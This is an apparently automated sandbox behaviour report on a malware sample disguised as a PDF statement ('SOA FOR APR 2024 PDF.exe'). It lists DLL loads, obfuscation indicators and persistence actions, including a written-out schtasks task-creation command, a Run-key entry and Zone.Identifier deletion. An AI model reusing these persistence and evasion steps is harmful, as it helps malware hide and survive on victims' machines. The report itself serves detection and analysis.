                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: wbemcomn.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: rasapi32.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: rasman.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: rtutils.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: secur32.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: schannel.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: vaultcli.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: edputil.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: windowscodecs.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: dwrite.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: windowscodecs.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: propsys.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: edputil.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: netutils.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: windows.staterepositoryps.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: appresolver.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: bcp47langs.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: slc.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: sppc.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: onecorecommonproxystub.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: wbemcomn.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: rasapi32.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: rasman.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: rtutils.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: secur32.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: schannel.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: vaultcli.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: edputil.dll
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                    Source: Window Recorder; Window detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe; File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
                    Source: SOA FOR APR 2024 PDF.exe; Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: SOA FOR APR 2024 PDF.exe; Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Data Obfuscation

                    Source: 0.2.SOA FOR APR 2024 PDF.exe.3b69970.6.raw.unpack, V4uC3Iifq56IKQcfry.cs; .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                    Source: SOA FOR APR 2024 PDF.exe, SpreadsheetName.cs; .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                    Source: eeBIYZL.exe.0.dr, SpreadsheetName.cs; .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.SOA FOR APR 2024 PDF.exe.475f6b0.8.raw.unpack, URqoV1LhkZEcr5B7SE.cs; .Net Code: hfPd2Vxtwp System.Reflection.Assembly.Load(byte[])
                    Source: SOA FOR APR 2024 PDF.exeStatic PE information: section name: .text entropy: 7.967897552415294
                    Source: eeBIYZL.exe.0.drStatic PE information: section name: .text entropy: 7.967897552415294
                    Source: 0.2.SOA FOR APR 2024 PDF.exe.3b69970.6.raw.unpack: High entropy of concatenated method names
                    Source: 0.2.SOA FOR APR 2024 PDF.exe.475f6b0.8.raw.unpack: High entropy of concatenated method names
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe File created: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe File created: C:\Users\user\AppData\Roaming\eeBIYZL.exe

                    Boot Survival

                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eeBIYZL" /XML "C:\Users\user\AppData\Local\Temp\tmpCB26.tmp"
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BjTxJte

                    Hooking and other Techniques for Hiding and Protection

                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe File opened: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe:Zone.Identifier read attributes | delete
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe File opened: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe:Zone.Identifier read attributes | delete
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
